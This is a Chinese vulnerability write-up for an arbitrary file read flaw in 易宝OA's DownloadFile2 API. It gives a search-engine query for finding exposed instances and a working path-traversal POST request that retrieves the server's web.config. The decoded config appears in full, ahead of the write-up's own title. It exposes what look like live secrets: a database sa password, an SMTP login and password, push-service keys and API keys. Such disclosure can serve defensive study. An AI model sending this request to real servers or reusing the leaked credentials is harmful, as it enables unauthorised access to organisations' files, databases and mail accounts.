Q0gsT1BUSU9OUyIgbW9kdWxlcz0iSXNhcGlNb2R1bGUiIHNjcmlwdFByb2Nlc3Nvcj0iJXdpbmRpciVcTWljcm9zb2Z0Lk5FVFxGcmFtZXdvcms2NFx2NC4wLjMwMzE5XGFzcG5ldF9pc2FwaS5kbGwiIHByZUNvbmRpdGlvbj0iY2xhc3NpY01vZGUscnVudGltZVZlcnNpb252NC4wLGJpdG5lc3M2NCIgcmVzcG9uc2VCdWZmZXJMaW1pdD0iMCIgLz4NCiAgICAgIDxhZGQgbmFtZT0iRXh0ZW5zaW9ubGVzc1VybEhhbmRsZXItSW50ZWdyYXRlZC00LjAiIHBhdGg9IiouIiB2ZXJiPSJHRVQsSEVBRCxQT1NULERFQlVHLFBVVCxERUxFVEUsUEFUQ0gsT1BUSU9OUyIgdHlwZT0iU3lzdGVtLldlYi5IYW5kbGVycy5UcmFuc2ZlclJlcXVlc3RIYW5kbGVyIiBwcmVDb25kaXRpb249ImludGVncmF0ZWRNb2RlLHJ1bnRpbWVWZXJzaW9udjQuMCIgLz4NCiAgICA8L2hhbmRsZXJzPg0KICAgIDxzZWN1cml0eT4NCiAgICAgIDxyZXF1ZXN0RmlsdGVyaW5nIGFsbG93RG91YmxlRXNjYXBpbmc9InRydWUiIC8+DQogICAgPC9zZWN1cml0eT4NCiAgICA8c3RhdGljQ29udGVudD4NCiAgICAgIDxyZW1vdmUgZmlsZUV4dGVuc2lvbj0iLndvZmYiIC8+DQogICAgICA8bWltZU1hcCBmaWxlRXh0ZW5zaW9uPSIud29mZiIgbWltZVR5cGU9ImFwcGxpY2F0aW9uL3gtZm9udC13b2ZmIiAvPg0KICAgICAgPHJlbW92ZSBmaWxlRXh0ZW5zaW9uPSIud29mZjIiIC8+DQogICAgICA8bWltZU1hcCBmaWxlRXh0ZW5zaW9uPSIud29mZjIiIG1pbWVUeXBlPSJhcHBsaWNhdGlvbi94LWZvbnQtd29mZjIiIC8+DQogICAgICA8cmVtb3ZlIGZpbGVFeHRlbnNpb249Ii50dGYiIC8+DQogICAgICA8bWltZU1hcCBmaWxlRXh0ZW5zaW9uPSIudHRmIiBtaW1lVHlwZT0iYXBwbGljYXRpb24veC1mb250LXRydWV0eXBlIiAvPg0KICAgICAgPHJlbW92ZSBmaWxlRXh0ZW5zaW9uPSIuc3ZnIiAvPg0KICAgICAgPG1pbWVNYXAgZmlsZUV4dGVuc2lvbj0iLnN2ZyIgbWltZVR5cGU9ImltYWdlL3N2Zyt4bWwiIC8+DQogICAgICA8cmVtb3ZlIGZpbGVFeHRlbnNpb249Ii5vdGYiIC8+DQogICAgICA8bWltZU1hcCBmaWxlRXh0ZW5zaW9uPSIub3RmIiBtaW1lVHlwZT0iYXBwbGljYXRpb24veC1mb250LW9wZW50eXBlIiAvPg0KICAgICAgPHJlbW92ZSBmaWxlRXh0ZW5zaW9uPSIuZW90IiAvPg0KICAgICAgPG1pbWVNYXAgZmlsZUV4dGVuc2lvbj0iLmVvdCIgbWltZVR5cGU9ImFwcGxpY2F0aW9uL3ZuZC5tcy1mb250b2JqZWN0IiAvPg0KICAgIDwvc3RhdGljQ29udGVudD4NCiAgPC9zeXN0ZW0ud2ViU2VydmVyPg0KICA8cnVudGltZT4NCiAgICA8YXNzZW1ibHlCaW5kaW5nIHhtbG5zPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOmFzbS52MSI+DQogICAgICA8ZGVwZW5kZW50QXNzZW1ibHk+DQogICAgICAgIDxhc3NlbWJseUlkZW50aXR5IG5hbWU9IlN5c3RlbS5XZWIuSGVscGVycyIgcHVibGljS2V5VG9rZW49IjMxYmYzODU2YWQzNjRlMzUiIC8+DQogICAgICAgIDxiaW5kaW5nUmVkaXJlY3Qgb2xkVmVyc2lvbj0iMS4wLjAuMC0yLjAuMC4wIiBuZXdWZXJzaW9uPSIyLjAuMC4wIiAvPg0KICAgICAgPC9kZXBlbmRlbnRBc3NlbWJseT4NCiAgICAgIDxkZXBlbmRlbnRBc3NlbWJseT4NCiAgICAgICAgPGFzc2VtYmx5SWRlbnRpdHkgbmFtZT0iU3lzdGVtLldlYi5NdmMiIHB1YmxpY0tleVRva2VuPSIzMWJmMzg1NmFkMzY0ZTM1IiAvPg0KICAgICAgICA8YmluZGluZ1JlZGlyZWN0IG9sZFZlcnNpb249IjEuMC4wLjAtNC4wLjAuMCIgbmV3VmVyc2lvbj0iNC4wLjAuMCIgLz4NCiAgICAgIDwvZGVwZW5kZW50QXNzZW1ibHk+DQogICAgICA8ZGVwZW5kZW50QXNzZW1ibHk+DQogICAgICAgIDxhc3NlbWJseUlkZW50aXR5IG5hbWU9IlN5c3RlbS5XZWIuV2ViUGFnZXMiIHB1YmxpY0tleVRva2VuPSIzMWJmMzg1NmFkMzY0ZTM1IiAvPg0KICAgICAgICA8YmluZGluZ1JlZGlyZWN0IG9sZFZlcnNpb249IjEuMC4wLjAtMi4wLjAuMCIgbmV3VmVyc2lvbj0iMi4wLjAuMCIgLz4NCiAgICAgIDwvZGVwZW5kZW50QXNzZW1ibHk+DQogICAgICA8ZGVwZW5kZW50QXNzZW1ibHk+DQogICAgICAgIDxhc3NlbWJseUlkZW50aXR5IG5hbWU9IldlYkdyZWFzZSIgcHVibGljS2V5VG9rZW49IjMxYmYzODU2YWQzNjRlMzUiIC8+DQogICAgICAgIDxiaW5kaW5nUmVkaXJlY3Qgb2xkVmVyc2lvbj0iMC4wLjAuMC0xLjMuMC4wIiBuZXdWZXJzaW9uPSIxLjMuMC4wIiAvPg0KICAgICAgPC9kZXBlbmRlbnRBc3NlbWJseT4NCiAgICAgIDxkZXBlbmRlbnRBc3NlbWJseT4NCiAgICAgICAgPGFzc2VtYmx5SWRlbnRpdHkgbmFtZT0iTmV3dG9uc29mdC5Kc29uIiBwdWJsaWNLZXlUb2tlbj0iMzBhZDRmZTZiMmE2YWVlZCIgY3VsdHVyZT0ibmV1dHJhbCIgLz4NCiAgICAgICAgPGJpbmRpbmdSZWRpcmVjdCBvbGRWZXJzaW9uPSIwLjAuMC4wLTExLjAuMC4wIiBuZXdWZXJzaW9uPSIxMC4wLjAuMCIgLz4NCiAgICAgIDwvZGVwZW5kZW50QXNzZW1ibHk+DQogICAgPC9hc3NlbWJseUJpbmRpbmc+DQogIDwvcnVudGltZT4NCiAgPGVudGl0eUZyYW1ld29yaz4NCiAgICA8ZGVmYXVsdENvbm5lY3Rpb25GYWN0b3J5IHR5cGU9IlN5c3RlbS5EYXRhLkVudGl0eS5JbmZyYXN0cnVjdHVyZS5Mb2NhbERiQ29ubmVjdGlvbkZhY3RvcnksIEVudGl0eUZyYW1ld29yayI+DQogICAgICA8cGFyYW1ldGVycz4NCiAgICAgICAgPHBhcmFtZXRlciB2YWx1ZT0idjEzLjAiIC8+DQogICAgICA8L3BhcmFtZXRlcnM+DQogICAgPC9kZWZhdWx0Q29ubmVjdGlvbkZhY3Rvcnk+DQogIDwvZW50aXR5RnJhbWV3b3JrPg0KPC9jb25maWd1cmF0aW9uPg==

base64解码

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<configuration>
  <configSections>
    <!--  For more information on Entity Framework configuration, visit http://go.microsoft.com/fwlink/?LinkID=237468  -->
    <section name="entityFramework" type="System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=4.4.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" requirePermission="false" />
  </configSections>
  <connectionStrings />
  <appSettings>
    <add key="vs:EnableBrowserLink" value="false" />
    <!-- 数据库连接 -->
    <add key="ReportConnectString" value="Data Source=127.0.0.1,14330;Initial Catalog=SmartTrade_A3_Report;Persist Security Info=True;User ID=sa;Password=topvision_its365" />
    <add key="ConnectString" value="Data Source=127.0.0.1,14330;Initial Catalog=SmartTrade_A3;Persist Security Info=True;User ID=sa;Password=topvision_its365" />
    <!-- 是否为调试模式 -->
    <add key="Debug" value="True" />
    <!-- 指定服务器加密狗,适用于多个服务器端共存于一台主机 Enlist=false  SmartTrade_RPMT -->
    <add key="HaspID" value="" />
    <!-- 版本号 -->
    <add key="ServerVersion" value="12.0.6.0" />
    <!-- 超级用户iKey编号 -->
    <add key="SuperUserIkeyCode" value="70480000FFFFC5BB" />
    <!-- 相关数据类型保留的小数点 -->
    <add key="CurrencyLen" value="4" />
    <add key="PriceLen" value="6" />
    <add key="QtyLen" value="0" />
    <add key="AmountLen" value="2" />
    <!-- 相关数据类型显示格式 -->
    <add key="CurrencyFormat" value="#,##0.####" />
    <add key="PriceFormat" value="#,##0.000000" />
    <add key="QtyFormat" value="#,##0" />
    <add key="AmountFormat" value="#,##0.00" />
    <!-- 密码相关 -->
    <add key="TokenKey" value="IuKJd8909" />
    <add key="WebServicePassword" value="{ac80457b-368d-4062-b2dd-ae4d490e1c4b}" />
    <!-- 客户端登录时是否需要iKey -->
    <add key="USBKEY" value="False" />
    <!-- 客户端获取消息的时间间隔(s) -->
    <add key="MessageTimeInterval" value="30" />
    <!-- 日程管理所在模块名称、Form名称(以;分隔) -->
    <add key="ScheduleAssemblySetting" value="Fes.Schedule_Customize.exe;Fes.Schedule_Customize.frmScheduleList" />
    <!-- 客户端文件更新地址 -->
    <add key="ClientUpdateURL" value="http://update.its365.net" />
    <!-- 是否启用客户分支 -->
    <add key="EnableCustomerBranch" value="False" />
    <!-- 是否启用供应商分支 -->
    <add key="EnableSupplierBranch" value="False" />
    <!-- 打印格式模板文件夹 -->
    <!-- 打印格式模板文件夹 -->
    <add key="RptFileFolder" value="D:\Topvision\SmartTradeServer\UpLoadPath\rpt" />
    <!-- 标准文档存放文件夹 -->
    <add key="UpLoadPath" value="D:\Topvision\SmartTradeServer\UpLoadPath" />
    <!-- 个人文档存放文件夹 -->
    <add key="PersonalDocumentUpLoadPath" value="D:\Topvision\SmartTradeServer\UpLoadPath\PersonalDocument" />
    <!-- 商学院文档存放文件夹 -->
    <add key="EduUpLoadPath" value="D:\EduUpLoadPath" />
    <!-- 单据文档存放文件夹 -->
    <add key="BillUpLoadPath" value="D:\Topvision\SmartTradeServer\UpLoadPath\BillUpLoadPath" />
    <!-- 查询数据任务生成Excle文件目录 -->
    <add key="TaskExcelUpLoadPath" value="D:\Topvision\SmartTradeServer\UpLoadPath\TaskExcelUpLoadPath" />
    <!-- 日志记录级别 0:不记录 1:简单 2:复杂 3:全部 -->
    <add key="LogLevel" value="1" />
    <!-- 登录窗口显示样式 0:默认 1:简单 2:隐藏 -->
    <add key="LoginFormStyle" value="0" />
    <!-- SQL执行超时时间 -->
    <add key="SQLCommandRunTimeout" value="1000" />
    <!-- 应收应付查询时金额应该四舍五入的小数点 -->
    <add key="SearchFinancialLen" value="3" />
    <!--  远程协助服务商 0:ttvnc 1:infocare  -->
    <add key="VNCSponsorID" value="0" />
    <!--  远程协助服务器地址 -->
    <add key="VNCServerAddress" value="vnc.its365.net" />
    <!--  远程协助服务器端口 -->
    <add key="VNCServerPort" value="23" />
    <!--  帮助文档服务器 -->
    <add key="HelpServerAddress" value="help.topvision.me" />
    <!--  邮件配置 Start -->
    <add key="UseDefaultCredentials" value="false" />
    <add key="SMTPEnableSSL" value="True" />
    <add key="SMTPHost" value="smtp.qq.com" />
    <add key="SMTPPort" value="587" />
    <add key="SMTPUser" value="3080024452@qq.com" />
    <add key="SMTPCC" value="" />
    <add key="SMTPPassword" value="ofpjylxrbapedeae" />
    <add key="SMTPFrom" value="3080024452@qq.com" />
    <!--  邮件配置 End -->
    <!-- 更新服务所在路径 -->
    <add key="UpdateServicePath" value="D:\Topvision\SmartTradeServer\update" />
    <!-- 备份服务所在路径 -->
    <add key="BackupServicePath" value="D:\Topvision\SmartTradeServer\Backup" />
    <!-- 消息服务所在路径 -->
    <add key="MessageServicePath" value="D:\Topvision\SmartTradeServer\Message" />
    <!-- 任务计划服务所在路径 -->
    <add key="TaskServicePath" value="D:\Topvision\SmartTradeServer\Task" />
    <!-- SafeNet地址 -->
    <add key="SafeNetUri" value="localhost:1947" />
    <!--  短信配置 Start -->
    <add key="SMSServer" value="http://sms.its365.net/SMSSend.aspx" />
    <add key="SMSUserName" value="" />
    <add key="SMSPassword" value="" />
    <!--  安卓版本 -->
    <add key="AndRoidVersion" value="1.6.7.4" />
    <add key="AndRoidDownLoadUrl" value="http://www.its365.net:8080/" />
    <!--  安卓APP版本 -->
    <add key="AndRoidAPPVersion" value="1.1.1" />
    <add key="AndRoidAPPDownLoadUrl" value="http://www.its365.net:8080/" />
    <!--  TV版本 -->
    <add key="TVAppVersion" value="1.0.0.7" />
    <add key="TVAppVersionDownLoadUrl" value="http://www.its365.net:8080/TV/" />
    <!--  消息推送版本 -->
    <add key="APPID" value="QnzUMDGQhK72AeyOLIiyz2" />
    <add key="APPKEY" value="by6TulalzK76FpC450LZy" />
    <add key="MASTERSECRET" value="yg98TLlHHL6Ev09Ph9g8H6" />
    <add key="webpages:Enabled" value="false" />
    <add key="PreserveLoginUrl" value="true" />
    <add key="ClientValidationEnabled" value="true" />
    <add key="UnobtrusiveJavaScriptEnabled" value="true" />
    <!--   YUN服务才有，其它服务器可删除或值 为0 -->
    <add key="YunAPP" value="0" />
    <!--   APP -->
    <add key="AppUserNum" value="heQ17r2lkrMQDDINGv7Ttw==" />
    <add key="ScanUserNum" value="IEQ82dfxgegPP4tveVgjjA==" />
    <!-- 库存缓存功能  默认0不开启 1开启 -->
    <add key="ProductInventoryCacheServer" value="0" />
    <add key="ProMaterielArrangeEffect" value="0" />
    <!-- 对外开放API加密KEY -->
    <add key="APIKEY" value="by6Tulal85zK76FpC1450LFCX" />
  </appSettings>
  <!-- 下面的在多个子目录情况下需要 -->
  <!-- <location path="." allowOverride="false" inheritInChildApplications="false"/> -->
  <system.web>
    <!-- <globalization requestEncoding="gb2312" responseEncoding="gb2312" culture="zh-CN" fileEncoding="gb2312" /> -->
    <!-- <globalization requestEncoding="utf-8" responseEncoding="utf-8"/> -->
    <customErrors mode="Off" defaultRedirect="/ErrPage" />
    <compilation targetFramework="4.0" />
    <authentication mode="None" />
    <httpRuntime maxRequestLength="102400" useFullyQualifiedRedirectUrl="false" executionTimeout="951200" minFreeThreads="8" minLocalRequestFreeThreads="4" appRequestQueueLimit="10000" enableVersionHeader="true" />
    <pages controlRenderingCompatibilityVersion="4.0" validateRequest="false">
      <namespaces>
        <add namespace="System.Web.Helpers" />
        <add namespace="System.Web.Mvc" />
        <add namespace="System.Web.Mvc.Ajax" />
        <add namespace="System.Web.Mvc.Html" />
        <add namespace="System.Web.Optimization" />
        <add namespace="System.Web.Routing" />
        <add namespace="System.Web.WebPages" />
      </namespaces>
    </pages>
    <profile defaultProvider="DefaultProfileProvider">
      <providers>
        <add name="DefaultProfileProvider" type="System.Web.Providers.DefaultProfileProvider, System.Web.Providers, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" connectionStringName="DefaultConnection" applicationName="/" />
      </providers>
    </profile>
    <membership defaultProvider="DefaultMembershipProvider">
      <providers>
        <add name="DefaultMembershipProvider" type="System.Web.Providers.DefaultMembershipProvider, System.Web.Providers, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" connectionStringName="DefaultConnection" enablePasswordRetrieval="false" enablePasswordReset="true" requiresQuestionAndAnswer="false" requiresUniqueEmail="false" maxInvalidPasswordAttempts="5" minRequiredPasswordLength="6" minRequiredNonalphanumericCharacters="0" passwordAttemptWindow="10" applicationName="/" />
      </providers>
    </membership>
    <roleManager defaultProvider="DefaultRoleProvider">
      <providers>
        <add name="DefaultRoleProvider" type="System.Web.Providers.DefaultRoleProvider, System.Web.Providers, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" connectionStringName="DefaultConnection" applicationName="/" />
      </providers>
    </roleManager>
    <!-- 
            If you are deploying to a cloud environment that has multiple web server instances,
            you should change session state mode from "InProc" to "Custom". In addition,
            change the connection string named "DefaultConnection" to connect to an instance
            of SQL Server (including SQL Azure and SQL  Compact) instead of to SQL Server Express.
       -->
    <sessionState mode="InProc" timeout="1" customProvider="DefaultSessionProvider">
      <providers>
        <add name="DefaultSessionProvider" type="System.Web.Providers.DefaultSessionStateProvider, System.Web.Providers, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" connectionStringName="DefaultConnection" />
      </providers>
    </sessionState>
  </system.web>
  <system.webServer>
    <httpProtocol>
      <customHeaders>
        <add name="Access-Control-Allow-Origin" value="*" />
        <add name="Access-Control-Max-Age" value="30" />
        <add name="Access-Control-Allow-Methods" value="GET,POST,OPTIONS" />
        <add name="Access-Control-Allow-Headers" value="Content-Type, Accept" />
      </customHeaders>
    </httpProtocol>
    <validation validateIntegratedModeConfiguration="false" />
    <modules runAllManagedModulesForAllRequests="true" />
    <handlers>
      <remove name="ExtensionlessUrlHandler-ISAPI-4.0_32bit" />
      <remove name="ExtensionlessUrlHandler-ISAPI-4.0_64bit" />
      <remove name="ExtensionlessUrlHandler-Integrated-4.0" />
      <add name="ExtensionlessUrlHandler-ISAPI-4.0_32bit" path="*." verb="GET,HEAD,POST,DEBUG,PUT,DELETE,PATCH,OPTIONS" modules="IsapiModule" scriptProcessor="%windir%\Microsoft.NET\Framework\v4.0.30319\aspnet_isapi.dll" preCondition="classicMode,runtimeVersionv4.0,bitness32" responseBufferLimit="0" />
      <add name="ExtensionlessUrlHandler-ISAPI-4.0_64bit" path="*." verb="GET,HEAD,POST,DEBUG,PUT,DELETE,PATCH,OPTIONS" modules="IsapiModule" scriptProcessor="%windir%\Microsoft.NET\Framework64\v4.0.30319\aspnet_isapi.dll" preCondition="classicMode,runtimeVersionv4.0,bitness64" responseBufferLimit="0" />
      <add name="ExtensionlessUrlHandler-Integrated-4.0" path="*." verb="GET,HEAD,POST,DEBUG,PUT,DELETE,PATCH,OPTIONS" type="System.Web.Handlers.TransferRequestHandler" preCondition="integratedMode,runtimeVersionv4.0" />
    </handlers>
    <security>
      <requestFiltering allowDoubleEscaping="true" />
    </security>
    <staticContent>
      <remove fileExtension=".woff" />
      <mimeMap fileExtension=".woff" mimeType="application/x-font-woff" />
      <remove fileExtension=".woff2" />
      <mimeMap fileExtension=".woff2" mimeType="application/x-font-woff2" />
      <remove fileExtension=".ttf" />
      <mimeMap fileExtension=".ttf" mimeType="application/x-font-truetype" />
      <remove fileExtension=".svg" />
      <mimeMap fileExtension=".svg" mimeType="image/svg+xml" />
      <remove fileExtension=".otf" />
      <mimeMap fileExtension=".otf" mimeType="application/x-font-opentype" />
      <remove fileExtension=".eot" />
      <mimeMap fileExtension=".eot" mimeType="application/vnd.ms-fontobject" />
    </staticContent>
  </system.webServer>
  <runtime>
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
      <dependentAssembly>
        <assemblyIdentity name="System.Web.Helpers" publicKeyToken="31bf3856ad364e35" />
        <bindingRedirect oldVersion="1.0.0.0-2.0.0.0" newVersion="2.0.0.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="System.Web.Mvc" publicKeyToken="31bf3856ad364e35" />
        <bindingRedirect oldVersion="1.0.0.0-4.0.0.0" newVersion="4.0.0.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="System.Web.WebPages" publicKeyToken="31bf3856ad364e35" />
        <bindingRedirect oldVersion="1.0.0.0-2.0.0.0" newVersion="2.0.0.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="WebGrease" publicKeyToken="31bf3856ad364e35" />
        <bindingRedirect oldVersion="0.0.0.0-1.3.0.0" newVersion="1.3.0.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />
        <bindingRedirect oldVersion="0.0.0.0-11.0.0.0" newVersion="10.0.0.0" />
      </dependentAssembly>
    </assemblyBinding>
  </runtime>
  <entityFramework>
    <defaultConnectionFactory type="System.Data.Entity.Infrastructure.LocalDbConnectionFactory, EntityFramework">
      <parameters>
        <parameter value="v13.0" />
      </parameters>
    </defaultConnectionFactory>
  </entityFramework>
</configuration>

易宝OA-downloadfile2-文件读取.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/tun3wbyofzew0g0q

# 易宝OA downloadfile2 任意文件读取漏洞

# 一、漏洞简介
易宝OA是一款非常强大的手机办公软件，这里不仅为广大的用户提供了一个更好的工作日历，而且每个人都可以在这里进行重要事项的记录，同时软件中还拥有更好的打卡系统，让用户可以快速记录自己的工作时常，而且调班与补卡也会更加的简单，让你工作活跃度得到提升。易宝OA downloadfile2 任意文件读取漏洞，攻击者可通过该漏洞获取敏感信息。

# 二、影响版本

- 易宝OA

# 三、资产测绘

- hunter`web.title="欢迎登录易宝OA系统"||banner="易宝OA"`
- 特征

![image.png](./img/q4LvHtooUlBMlUT3/1700988213496-3ae2a8dc-fa00-47ad-8b54-e4aaa8bc1223-574614.png)

# 四、漏洞复现
```java
POST /api/files/DownloadFile2 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Content-Length: 94
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

token=zxh&requestFileName=../../manager/web.config&pathType=1&startPosition=0&bufferSize=1000 
```
![image.png](./img/q4LvHtooUlBMlUT3/1708518829232-2a879ef4-0a56-4061-b965-797540eabcc4-099649.png)
```java
77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9InllcyI/Pg0KPGNvbmZpZ3VyYXRpb24+DQogIDxjb25maWdTZWN0aW9ucz4NCiAgICA8IS0tICBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBFbnRpdHkgRnJhbWV3b3JrIGNvbmZpZ3VyYXRpb24sIHZpc2l0IGh0dHA6Ly9nby5taWNyb3NvZnQuY29tL2Z3bGluay8/TGlua0lEPTIzNzQ2OCAgLS0+DQogICAgPHNlY3Rpb24gbmFtZT0iZW50aXR5RnJhbWV3b3JrIiB0eXBlPSJTeXN0ZW0uRGF0YS5FbnRpdHkuSW50ZXJuYWwuQ29uZmlnRmlsZS5FbnRpdHlGcmFtZXdvcmtTZWN0aW9uLCBFbnRpdHlGcmFtZXdvcmssIFZlcnNpb249NC40LjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5IiByZXF1aXJlUGVybWlzc2lvbj0iZmFsc2UiIC8+DQogIDwvY29uZmlnU2VjdGlvbnM+DQogIDxjb25uZWN0aW9uU3RyaW5ncyAvPg0KICA8YXBwU2V0dGluZ3M+DQogICAgPGFkZCBrZXk9InZzOkVuYWJsZUJyb3dzZXJMaW5rIiB2YWx1ZT0iZmFsc2UiIC8+DQogICAgPCEtLSDmlbDmja7lupPov57mjqUgLS0+DQogICAgPGFkZCBrZXk9IlJlcG9ydENvbm5lY3RTdHJpbmciIHZhbHVlPSJEYXRhIFNvdXJjZT0xMjcuMC4wLjEsMTQzMzA7SW5pdGlhbCBDYXRhbG9nPVNtYXJ0VHJhZGVfQTNfUmVwb3J0O1BlcnNpc3QgU2VjdXJpdHkgSW5mbz1UcnVlO1VzZXIgSUQ9c2E7UGFzc3dvcmQ9dG9wdmlzaW9uX2l0czM2NSIgLz4NCiAgICA8YWRkIGtleT0iQ29ubmVjdFN0cmluZyIgdmFsdWU9IkRhdGEgU291cmNlPTEyNy4wLjAuMSwxNDMzMDtJbml0aWFsIENhdGFsb2c9U21hcnRUcmFkZV9BMztQZXJzaXN0IFNlY3VyaXR5IEluZm89VHJ1ZTtVc2VyIElEPXNhO1Bhc3N3b3JkPXRvcHZpc2lvbl9pdHMzNjUiIC8+DQogICAgPCEtLSDmmK/lkKbkuLrosIPor5XmqKHlvI8gLS0+DQogICAgPGFkZCBrZXk9IkRlYnVnIiB2YWx1ZT0iVHJ1ZSIgLz4NCiAgICA8IS0tIOaMh+WumuacjeWKoeWZqOWKoOWvhueLlyzpgILnlKjkuo7lpJrkuKrmnI3liqHlmajnq6/lhbHlrZjkuo7kuIDlj7DkuLvmnLogRW5saXN0PWZhbHNlICBTbWFydFRyYWRlX1JQTVQgLS0+DQogICAgPGFkZCBrZXk9Ikhhc3BJRCIgdmFsdWU9IiIgLz4NCiAgICA8IS0tIOeJiOacrOWPtyAtLT4NCiAgICA8YWRkIGtleT0iU2VydmVyVmVyc2lvbiIgdmFsdWU9IjEyLjAuNi4wIiAvPg0KICAgIDwhLS0g6LaF57qn55So5oi3aUtleee8luWPtyAtLT4NCiAgICA8YWRkIGtleT0iU3VwZXJVc2VySWtleUNvZGUiIHZhbHVlPSI3MDQ4MDAwMEZGRkZDNUJCIiAvPg0KICAgIDwhLS0g55u45YWz5pWw5o2u57G75Z6L5L+d55WZ55qE5bCP5pWw54K5IC0tPg0KICAgIDxhZGQga2V5PSJDdXJyZW5jeUxlbiIgdmFsdWU9IjQiIC8+DQogICAgPGFkZCBrZXk9IlByaWNlTGVuIiB2YWx1ZT0iNiIgLz4NCiAgICA8YWRkIGtleT0iUXR5TGVuIiB2YWx1ZT0iMCIgLz4NCiAgICA8YWRkIGtleT0iQW1vdW50TGVuIiB2YWx1ZT0iMiIgLz4NCiAgICA8IS0tIOebuOWFs+aVsOaNruexu+Wei+aYvuekuuagvOW8jyAtLT4NCiAgICA8YWRkIGtleT0iQ3VycmVuY3lGb3JtYXQiIHZhbHVlPSIjLCMjMC4jIyMjIiAvPg0KICAgIDxhZGQga2V5PSJQcmljZUZvcm1hdCIgdmFsdWU9IiMsIyMwLjAwMDAwMCIgLz4NCiAgICA8YWRkIGtleT0iUXR5Rm9ybWF0IiB2YWx1ZT0iIywjIzAiIC8+DQogICAgPGFkZCBrZXk9IkFtb3VudEZvcm1hdCIgdmFsdWU9IiMsIyMwLjAwIiAvPg0KICAgIDwhLS0g5a+G56CB55u45YWzIC0tPg0KICAgIDxhZGQga2V5PSJUb2tlbktleSIgdmFsdWU9Ikl1S0pkODkwOSIgLz4NCiAgICA8YWRkIGtleT0iV2ViU2VydmljZVBhc3N3b3JkIiB2YWx1ZT0ie2FjODA0NTdiLTM2OGQtNDA2Mi1iMmRkLWFlNGQ0OTBlMWM0Yn0iIC8+DQogICAgPCEtLSDlrqLmiLfnq6/nmbvlvZXml7bmmK/lkKbpnIDopoFpS2V5IC0tPg0KICAgIDxhZGQga2V5PSJVU0JLRVkiIHZhbHVlPSJGYWxzZSIgLz4NCiAgICA8IS0tIOWuouaIt+err+iOt+WPlua2iOaBr+eahOaXtumXtOmXtOmalChzKSAtLT4NCiAgICA8YWRkIGtleT0iTWVzc2FnZVRpbWVJbnRlcnZhbCIgdmFsdWU9IjMwIiAvPg0KICAgIDwhLS0g5pel56iL566h55CG5omA5Zyo5qih5Z2X5ZCN56ew44CBRm9ybeWQjeensCjku6U75YiG6ZqUKSAtLT4NCiAgICA8YWRkIGtleT0iU2NoZWR1bGVBc3NlbWJseVNldHRpbmciIHZhbHVlPSJGZXMuU2NoZWR1bGVfQ3VzdG9taXplLmV4ZTtGZXMuU2NoZWR1bGVfQ3VzdG9taXplLmZybVNjaGVkdWxlTGlzdCIgLz4NCiAgICA8IS0tIOWuouaIt+err+aWh+S7tuabtOaWsOWcsOWdgCAtLT4NCiAgICA8YWRkIGtleT0iQ2xpZW50VXBkYXRlVVJMIiB2YWx1ZT0iaHR0cDovL3VwZGF0ZS5pdHMzNjUubmV0IiAvPg0KICAgIDwhLS0g5piv5ZCm5ZCv55So5a6i5oi35YiG5pSvIC0tPg0KICAgIDxhZGQga2V5PSJFbmFibGVDdXN0b21lckJyYW5jaCIgdmFsdWU9IkZhbHNlIiAvPg0KICAgIDwhLS0g5piv5ZCm5ZCv55So5L6b5bqU5ZWG5YiG5pSvIC0tPg0KICAgIDxhZGQga2V5PSJFbmFibGVTdXBwbGllckJyYW5jaCIgdmFsdWU9IkZhbHNlIiAvPg0KICAgIDwhLS0g5omT5Y2w5qC85byP5qih5p2/5paH5Lu25aS5IC0tPg0KICAgIDwhLS0g5omT5Y2w5qC85byP5qih5p2/5paH5Lu25aS5IC0tPg0KICAgIDxhZGQga2V5PSJScHRGaWxlRm9sZGVyIiB2YWx1ZT0iRDpcVG9wdmlzaW9uXFNtYXJ0VHJhZGVTZXJ2ZXJcVXBMb2FkUGF0aFxycHQiIC8+DQogICAgPCEtLSDmoIflh4bmlofmoaPlrZjmlL7mlofku7blpLkgLS0+DQogICAgPGFkZCBrZXk9IlVwTG9hZFBhdGgiIHZhbHVlPSJEOlxUb3B2aXNpb25cU21hcnRUcmFkZVNlcnZlclxVcExvYWRQYXRoIiAvPg0KICAgIDwhLS0g5Liq5Lq65paH5qGj5a2Y5pS+5paH5Lu25aS5IC0tPg0KICAgIDxhZGQga2V5PSJQZXJzb25hbERvY3VtZW50VXBMb2FkUGF0aCIgdmFsdWU9IkQ6XFRvcHZpc2lvblxTbWFydFRyYWRlU2VydmVyXFVwTG9hZFBhdGhcUGVyc29uYWxEb2N1bWVudCIgLz4NCiAgICA8IS0tIOWVhuWtpumZouaWh+aho+WtmOaUvuaWh+S7tuWkuSAtLT4NCiAgICA8YWRkIGtleT0iRWR1VXBMb2FkUGF0aCIgdmFsdWU9IkQ6XEVkdVVwTG9hZFBhdGgiIC8+DQogICAgPCEtLSDljZXmja7mlofmoaPlrZjmlL7mlofku7blpLkgLS0+DQogICAgPGFkZCBrZXk9IkJpbGxVcExvYWRQYXRoIiB2YWx1ZT0iRDpcVG9wdmlzaW9uXFNtYXJ0VHJhZGVTZXJ2ZXJcVXBMb2FkUGF0aFxCaWxsVXBMb2FkUGF0aCIgLz4